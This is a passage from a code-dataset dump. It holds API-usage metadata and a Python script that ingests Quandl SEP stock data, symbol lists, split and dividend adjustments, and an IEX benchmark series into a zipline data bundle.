"numpy.random.uniform", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 207, "usage_type": "name"}, {"api_name": "keras.layers.Embedding", "line_number": 208, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 223, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 223, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 224, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 224, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 225, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 225, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 227, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 227, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 228, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 228, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 229, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 229, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 230, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 230, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 231, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 231, "usage_type": "name"}, {"api_name": "keras.layers.Input", "line_number": 234, "usage_type": "call"}, {"api_name": "keras.layers.Embedding", "line_number": 235, "usage_type": "call"}, {"api_name": "keras.layers.Conv1D", "line_number": 236, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 237, "usage_type": "call"}, {"api_name": "keras.layers.MaxPooling1D", "line_number": 238, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 239, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 240, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 241, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 242, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 245, "usage_type": "call"}, {"api_name": "keras.layers.Bidirectional", "line_number": 248, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 248, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 249, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 250, "usage_type": "call"}, {"api_name": "keras.layers.GlobalMaxPool1D", "line_number": 251, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 252, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 253, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 254, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 260, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 263, "usage_type": "call"}, {"api_name": "keras.layers.Conv1D", "line_number": 267, "usage_type": "call"}, {"api_name": "keras.layers.Bidirectional", "line_number": 268, "usage_type": "call"}, {"api_name": "keras.layers.LSTM", "line_number": 268, "usage_type": "call"}, {"api_name": "keras.layers.Attention", "line_number": 276, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 279, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 280, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 282, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 283, "usage_type": "call"}, {"api_name": "keras.layers.GlobalAveragePooling1D", "line_number": 287, "usage_type": "call"}, {"api_name": "keras.layers.GlobalAveragePooling1D", "line_number": 289, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 292, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 293, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 295, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 296, "usage_type": "call"}, {"api_name": "keras.layers.Concatenate", "line_number": 300, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 302, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Layer", "line_number": 312, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers", "line_number": 312, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.MultiHeadAttention", "line_number": 315, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 315, "usage_type": "name"}, {"api_name": "tensorflow.keras.Sequential", "line_number": 316, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 316, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 317, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 317, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.LayerNormalization", "line_number": 319, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 319, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.LayerNormalization", "line_number": 320, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 320, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 321, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 321, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 322, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 322, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Layer", "line_number": 333, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers", "line_number": 333, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 336, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 336, "usage_type": "name"}, {"api_name": "tensorflow.keras.layers.Embedding", "line_number": 337, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers", "line_number": 337, "usage_type": "name"}, {"api_name": "tensorflow.shape", "line_number": 340, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 341, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 347, "usage_type": "call"}, {"api_name": "keras.layers.Dropout", "line_number": 352, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 353, "usage_type": "call"}, {"api_name": "keras.layers.GlobalAveragePooling1D", "line_number": 354, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 355, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 366, "usage_type": "call"}, {"api_name": "pickle.HIGHEST_PROTOCOL", "line_number": 366, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 370, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 376, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 377, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 378, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 380, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 384, "usage_type": "call"}, {"api_name": "keras.preprocessing.text.Tokenizer", "line_number": 385, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 399, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 410, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 414, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 420, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 426, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 427, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 432, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 434, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 444, "usage_type": "call"}, {"api_name": "keras.preprocessing.sequence.pad_sequences", "line_number": 446, "usage_type": "call"}]} +{"seq_id": "604341468", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 14 10:14:23 2018\n\n@author: Prodipta\n\"\"\"\nimport os\nimport pandas as pd\nimport quandl\nimport json\nimport sys\nimport requests\nfrom StringIO import StringIO\nfrom datetime import datetime\n\nfrom zipline.data import bundles as bundles_module\nfrom zipline.data.bundles import register\nfrom zipline.data.bundles.SEP import sep_equities\nfrom zipline.data.bundles.ingest_utilities import read_big_csv,if_csvs_in_dir,split_csvs,update_csvs, clean_up, find_interval, upsert_pandas, unzip_to_directory, update_ticker_change, ensure_data_between_dates\n\ndef process_tickers_convention(tickers):\n tickers = [t.replace(\"_\",\"\") for t in tickers]\n tickers = [t.replace(\".\",\"\") for t in tickers]\n return tickers\n\ndef download_data(url, api_key, strpath):\n try:\n r = requests.get(url+api_key, stream=True)\n zipdata = StringIO()\n for chunk in r.iter_content(chunk_size=1024):\n if chunk:\n zipdata.write(chunk)\n unzip_to_directory(zipdata,strpath)\n except:\n raise IOError(\"failed to download latest data from Quandl\")\n\nclass IngestLoop:\n\n def __init__(self, configpath):\n with open(configpath) as configfile:\n config = json.load(configfile)\n self.config_path = configpath\n quandl.ApiConfig.api_key = config[\"QUANDL_API_KEY\"]\n self.quandl_table_name = config[\"QUANDL_TABLE_NAME\"]\n self.meta_path=config[\"META_PATH\"]\n self.daily_path=config[\"DAILY_PATH\"]\n self.download_path=config[\"DOWNLOAD_PATH\"]\n self.bizdays_file=config[\"BIZDAYLIST\"]\n self.wiki_url=config[\"WIKI_URL\"]\n self.sym_directory=config[\"SYM_DIRECTORY\"]\n self.symlist_file=config[\"SYMLIST\"]\n self.calendar_name=config[\"CALENDAR_NAME\"]\n self.calendar_tz=config[\"CALENDAR_TZ\"]\n self.code_file = config[\"SYMDATA\"]\n self.ticker_change_file = config[\"TICKER_CHANGE_FILE\"]\n self.benchmar_symbol=config[\"BENCHMARK_SYM\"]\n self.benchmark_file=config[\"BENCHMARKDATA\"]\n self.bundle_name=config[\"BUNDLE_NAME\"]\n self.bundle_path=config[\"BUNDLE_PATH\"]\n\n def ensure_codes(self, date):\n if not os.path.isfile(os.path.join(self.meta_path,self.code_file)):\n raise IOError(\"tickers list file missing\")\n\n mtime = pd.to_datetime(datetime.fromtimestamp(os.stat(os.path.join(self.meta_path,self.code_file)).st_mtime))\n mtime = mtime.tz_localize(tz=self.calendar_tz)\n time_delta = date - mtime\n\n if time_delta.days > 5:\n raise ValueError(\"tickers list file is stale, please update\")\n\n self.tickers = pd.read_csv(os.path.join(self.meta_path,self.code_file))\n self.tickers = self.tickers[self.tickers['table']=='SEP']\n\n def ensure_latest_sym_list(self,date):\n self.ensure_codes(date)\n dts = [dt.split(\".csv\")[0].split(\"symbols_\")[1] for dt in os.listdir(os.path.join(self.meta_path,self.sym_directory))]\n dts = pd.to_datetime(sorted(dts))\n lastDate = dts[-1].tz_localize(tz=self.calendar_tz)\n\n if date > lastDate:\n raise ValueError(\"symbol list in the symbols directory is stale. Please update\")\n\n def _read_symlist(self,strpath):\n sym_list = pd.read_csv(strpath)\n return sym_list\n\n def ensure_membership_maps(self):\n if os.path.isfile(os.path.join(self.meta_path,self.symlist_file)):\n membership_maps = pd.read_csv(os.path.join(self.meta_path,self.symlist_file))\n last_date = sorted(set(pd.to_datetime(membership_maps.end_date.tolist())))[-1]\n else:\n membership_maps = pd.DataFrame(columns=['symbol','asset_name','start_date','end_date'])\n last_date = pd.to_datetime(0)\n\n dts = [dt.split(\".csv\")[0].split(\"symbols_\")[1] for dt in os.listdir(os.path.join(self.meta_path,self.sym_directory))]\n dts = pd.to_datetime(sorted(dts))\n ndts = [d.value/1E9 for d in dts]\n ndate = last_date.value/1E9\n dts = dts[find_interval(ndate,ndts):]\n\n print(\"updating membership data...\")\n names_dict = dict(zip(self.tickers.ticker,self.tickers.name))\n for dt in dts:\n fname = \"symbols_\"+dt.date().strftime(\"%Y%m%d\")+\".csv\"\n print('reading {}'.format(fname))\n syms = pd.read_csv(os.path.join(self.meta_path,self.sym_directory,fname))['symbol'].tolist()\n syms = process_tickers_convention(syms)\n for sym in syms:\n upsert_pandas(membership_maps, 'symbol', sym, 'end_date', dt, names_dict)\n\n if len(membership_maps) == 0:\n raise ValueError(\"empty membership data\")\n\n print(\"checking for ticker change\")\n syms = membership_maps['symbol'].tolist()\n names = membership_maps['asset_name'].tolist()\n\n tickers_mismatch = [sym for index, sym in enumerate(syms) if sym == names[index]]\n ticker_change = {\"old\":self.tickers['relatedtickers'].tolist(),\"new\":self.tickers['ticker'].tolist(),\"name\":self.tickers['name'].tolist()}\n ticker_change = pd.DataFrame(ticker_change,columns=['old','new','name'])\n ticker_change = ticker_change.dropna()\n\n tickers_list = pd.read_csv(os.path.join(self.meta_path,self.ticker_change_file))\n tickers_list = pd.concat([tickers_list,ticker_change])\n tickers_list = tickers_list[~tickers_list.old.duplicated(keep='last')]\n tickers_list = tickers_list[tickers_list['old'].isin(tickers_mismatch)]\n membership_maps = update_ticker_change(membership_maps,tickers_list)\n\n print(\"updating membership complete\")\n\n membership_maps.to_csv(os.path.join(self.meta_path,self.symlist_file),index=False)\n self.symlist = membership_maps\n\n def _update_bizdays_list(self, dts):\n strpathmeta = os.path.join(self.meta_path,self.bizdays_file)\n init_dts = []\n if os.path.isfile(strpathmeta):\n init_dts = pd.read_csv(strpathmeta)\n init_dts = pd.to_datetime(init_dts['dates']).tolist()\n dts = init_dts + list(dts)\n bizdays = pd.DataFrame(sorted(set(dts)),columns=['dates'])\n bizdays.to_csv(strpathmeta,index=False)\n\n def get_bizdays(self):\n strpathmeta = os.path.join(self.meta_path,self.bizdays_file)\n bizdays = pd.read_csv(strpathmeta)\n return pd.to_datetime(bizdays['dates'].tolist())\n\n def _get_quandl_data_today(self,date):\n dfr = quandl.get_table(self.quandl_table_name, date=date, ticker=\",\".join(self.symlist))\n return dfr\n\n def create_csvs(self, date):\n if not if_csvs_in_dir(self.daily_path):\n dfr = pd.DataFrame(columns=['ticker','date','open','high','low','close',\n 'volume','dividends','closeunadj',\n 'lastupdated'])\n dfr = read_big_csv(self.download_path, self.symlist['symbol'],\"SHARADAR_SEP\")\n split_csvs(dfr,self.daily_path, OHLCV=False)\n dts = dfr['date']\n self._update_bizdays_list(dts)\n del dfr\n\n self.bizdays = pd.read_csv(os.path.join(self.meta_path,self.bizdays_file), parse_dates=[0])['dates'].tolist()\n start_date = pd.Timestamp(self.bizdays[-1]) + pd.Timedelta(\"1 days\")\n end_date = pd.Timestamp(date).replace(tzinfo=None)\n if not end_date >= start_date:\n print(\"latest data already available in csv folder\")\n return\n\n date_range = {\"gte\":start_date.date().strftime(\"%Y-%m-%d\"),\n \"lte\":end_date.date().strftime(\"%Y-%m-%d\")}\n print(date_range)\n dfr = quandl.get_table(self.quandl_table_name,\n date=date_range, ticker=\",\".join(self.symlist['symbol']))\n bizdays = set(dfr['date'])\n if len(bizdays) > 0:\n self._update_bizdays_list(bizdays)\n update_csvs(dfr,self.daily_path,OHLCV=False)\n print('daily csvs update completed.')\n\n def ensure_data_range(self):\n if not if_csvs_in_dir(self.daily_path):\n raise IOError(\"csv data files are not available\")\n\n files = [s for s in os.listdir(self.daily_path) if s.endswith(\".csv\")]\n\n for f in files:\n sym = f.split('.csv')[0]\n if sym == self.benchmar_symbol:\n continue\n start_date = self.symlist.start_date[self.symlist.symbol==sym].tolist()[0]\n end_date = self.symlist.end_date[self.symlist.symbol==sym].tolist()[0]\n ensure_data_between_dates(os.path.join(self.daily_path,f),\n start_date, end_date)\n\n def ensure_benchmark(self, date):\n if not os.path.isfile(os.path.join(self.meta_path, self.benchmark_file)):\n raise IOError(\"Benchmark file is missing\")\n\n df0 = pd.read_csv(os.path.join(self.meta_path,\n self.benchmark_file),parse_dates=[0],index_col=0).sort_index()\n df0 = df0.dropna()\n last_date = pd.to_datetime(df0.index[-1]).replace(tzinfo=None)\n date = date.replace(tzinfo=None)\n if date <= last_date:\n print(\"Benchmark file is already updated.\")\n df0.to_csv(os.path.join(self.daily_path,self.benchmar_symbol+'.csv'),\n index_label = 'date')\n return\n\n r = requests.get(\n 'https://api.iextrading.com/1.0/stock/{}/chart/5y'.format(self.benchmar_symbol)\n )\n data = json.loads(r.text)\n df1 = pd.DataFrame(data)\n df1.index = pd.DatetimeIndex(df1['date'])\n df1 = df1[['open','high','low','close','volume']]\n df1 = df1.sort_index()\n\n df = pd.concat([df0,df1])\n df = df[~df.index.duplicated(keep='last')]\n df.to_csv(os.path.join(self.meta_path,self.benchmark_file),\n index_label = 'date')\n df.to_csv(os.path.join(self.daily_path,self.benchmar_symbol+'.csv'),\n index_label = 'date')\n\n def update_membership_maps(self):\n if not if_csvs_in_dir(self.daily_path):\n raise IOError(\"csv data files are not available\")\n\n syms = [s.split(\".csv\")[0] for s in os.listdir(self.daily_path) if s.endswith(\".csv\")]\n membership_maps = self.symlist\n membership_maps = membership_maps[membership_maps.symbol.isin(syms)]\n self.symlist = membership_maps\n membership_maps.to_csv(os.path.join(self.meta_path,self.symlist_file),index=False)\n\n def make_adjustments_maps(self):\n if not if_csvs_in_dir(self.daily_path):\n raise IOError(\"csv data files are not available\")\n\n files = [s for s in os.listdir(self.daily_path) if s.endswith(\".csv\")]\n\n splits = pd.DataFrame(columns=['effective_date','symbol','ratio'])\n divs = pd.DataFrame(columns=['ex_date','symbol','amount'])\n dts = list(self.get_bizdays())\n\n for f in files:\n s = f.split('.csv')[0]\n if s == self.benchmar_symbol:\n continue\n\n start_date = self.symlist.start_date[self.symlist.symbol==s].tolist()[0]\n end_date = self.symlist.end_date[self.symlist.symbol==s].tolist()[0]\n\n dfr = pd.read_csv(os.path.join(self.daily_path, f),\n parse_dates=[0],\n infer_datetime_format=True,\n index_col=0).sort_index()\n dfr = dfr[start_date:end_date]\n\n if len(dfr) == 0:\n continue\n\n ratio = dfr['closeunadj']/dfr['close']\n dfr['ratio'] = (ratio/ratio.shift(1)).round(3)\n sdfr = dfr[dfr.ratio != 1].dropna()\n split_data = {'effective_date':sdfr.index,'symbol':[s]*len(sdfr),'ratio':sdfr.ratio}\n split_data = pd.DataFrame(split_data,columns=['effective_date','symbol','ratio'])\n splits = pd.concat([splits,split_data])\n\n ddfr = dfr[dfr.dividends != 0].dropna()\n div_data = {'ex_date':ddfr.index,'symbol':[s]*len(ddfr),'amount':ddfr.dividends}\n div_data = pd.DataFrame(div_data,columns=['ex_date','symbol','amount'])\n divs = pd.concat([divs,div_data])\n\n splits.effective_date = pd.to_datetime(splits.effective_date)\n divs.ex_date = pd.to_datetime(divs.ex_date)\n\n divs['declared_date'] = [dts[max(0,dts.index(e)-1)] for e in list(divs.ex_date)]\n divs['record_date'] = [dts[min(len(dts)-1,dts.index(e)+2)] for e in list(divs.ex_date)]\n divs['pay_date'] = divs['record_date']\n\n divs.declared_date = pd.to_datetime(divs.ex_date)\n divs.record_date = pd.to_datetime(divs.ex_date)\n divs.pay_date = pd.to_datetime(divs.ex_date)\n\n splits = splits.sort_index()\n divs = divs.sort_index()\n\n splits.to_csv(os.path.join(self.meta_path,'splits.csv'),index=False)\n divs.to_csv(os.path.join(self.meta_path,'dividends.csv'),index=False)\n\n def register_bundle(self):\n dts = (self.get_bizdays()).tz_localize(self.calendar_tz)\n register(self.bundle_name, sep_equities(self.config_path),calendar_name=self.calendar_name,\n start_session=None,end_session=None,\n create_writers=False)\n\n def call_ingest(self):\n clean_up(os.path.join(self.bundle_path,\"minute\"))\n clean_up(os.path.join(self.bundle_path,\"daily\"))\n print(\"calling ingest function\")\n self.register_bundle()\n bundles_module.ingest(self.bundle_name,os.environ,pd.Timestamp.utcnow())\n print(\"ingestion complete\")\n\n def run(self, date, update_codes=False):\n if update_codes == 'True':\n download_data(self.code_url,self.api_key,self.meta_path)\n\n self.ensure_latest_sym_list(date)\n self.ensure_membership_maps()\n self.create_csvs(date)\n self.ensure_data_range()\n self.update_membership_maps()\n self.make_adjustments_maps()\n self.ensure_benchmark(date)\n self.call_ingest()\n\n#config_path = \"C:/Users/academy.academy-72/Desktop/dev platform/data/SEP/meta/config.json\"\n#ingest_loop = IngestLoop(config_path)\n\n\ndef main():\n assert len(sys.argv) == 4, (\n 'Usage: python {} '\n ' '.format(os.path.basename(__file__)))\n\n dt = pd.Timestamp(sys.argv[1],tz='Etc/UTC')\n config_file = sys.argv[2]\n update_codes = sys.argv[3]\n\n ingest_looper = IngestLoop(config_file)\n ingest_looper.run(dt, update_codes)\n\n\nif __name__ == \"__main__\":\n main()\n", "sub_path": "zipline/data/bundles/sep_ingest_loop.py", "file_name": "sep_ingest_loop.py", "file_ext": "py", "file_size_in_byte": 14589, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 28, "usage_type": "call"}, {"api_name": "StringIO.StringIO", "line_number": 29, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.unzip_to_directory", "line_number": 33, "usage_type": "call"}, {"api_name": "json.load", "line_number": 41, "usage_type": "call"}, {"api_name": "quandl.ApiConfig", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 62, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 91, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 93, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 94, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 97, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.find_interval", "line_number": 100, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 107, "usage_type": "call"}, {"api_name": "os.path", "line_number": 107, "usage_type": "attribute"}, {"api_name": "zipline.data.bundles.ingest_utilities.upsert_pandas", "line_number": 110, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 121, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 124, "usage_type": "call"}, {"api_name": "os.path", "line_number": 124, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 125, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.update_ticker_change", "line_number": 128, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 138, "usage_type": "call"}, {"api_name": "os.path", "line_number": 138, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 139, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 140, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 146, "usage_type": "call"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 147, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 148, "usage_type": "call"}, {"api_name": "quandl.get_table", "line_number": 151, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.if_csvs_in_dir", "line_number": 155, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 156, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.read_big_csv", "line_number": 159, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.split_csvs", "line_number": 160, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 165, "usage_type": "call"}, {"api_name": "os.path", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pandas.Timestamp", "line_number": 166, "usage_type": "call"}, {"api_name": "pandas.Timedelta", "line_number": 166, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 167, "usage_type": "call"}, {"api_name": "quandl.get_table", "line_number": 175, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.update_csvs", "line_number": 180, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.if_csvs_in_dir", "line_number": 184, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 187, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.ensure_data_between_dates", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 195, "usage_type": "call"}, {"api_name": "os.path", "line_number": 195, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 199, "usage_type": "call"}, {"api_name": "os.path", "line_number": 199, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 199, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 202, "usage_type": "call"}, {"api_name": "os.path", "line_number": 202, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 205, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path", "line_number": 209, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 213, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 216, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 217, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 218, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 226, "usage_type": "call"}, {"api_name": "os.path", "line_number": 226, "usage_type": "attribute"}, {"api_name": "zipline.data.bundles.ingest_utilities.if_csvs_in_dir", "line_number": 230, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 233, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 237, "usage_type": "call"}, {"api_name": "os.path", "line_number": 237, "usage_type": "attribute"}, {"api_name": "zipline.data.bundles.ingest_utilities.if_csvs_in_dir", "line_number": 240, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 243, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 245, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 246, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 257, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 257, "usage_type": "call"}, {"api_name": "os.path", "line_number": 257, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 270, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 271, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 275, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 276, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 278, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 279, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 285, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 286, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 287, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path", "line_number": 292, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 293, "usage_type": "call"}, {"api_name": "os.path", "line_number": 293, "usage_type": "attribute"}, {"api_name": "zipline.data.bundles.register", "line_number": 297, "usage_type": "call"}, {"api_name": "zipline.data.bundles.SEP.sep_equities", "line_number": 297, "usage_type": "call"}, {"api_name": "zipline.data.bundles.ingest_utilities.clean_up", "line_number": 302, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 302, "usage_type": "call"}, {"api_name": "os.path", "line_number": 302, "usage_type": "attribute"}, {"api_name": "zipline.data.bundles.ingest_utilities.clean_up", "line_number": 303, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 303, "usage_type": 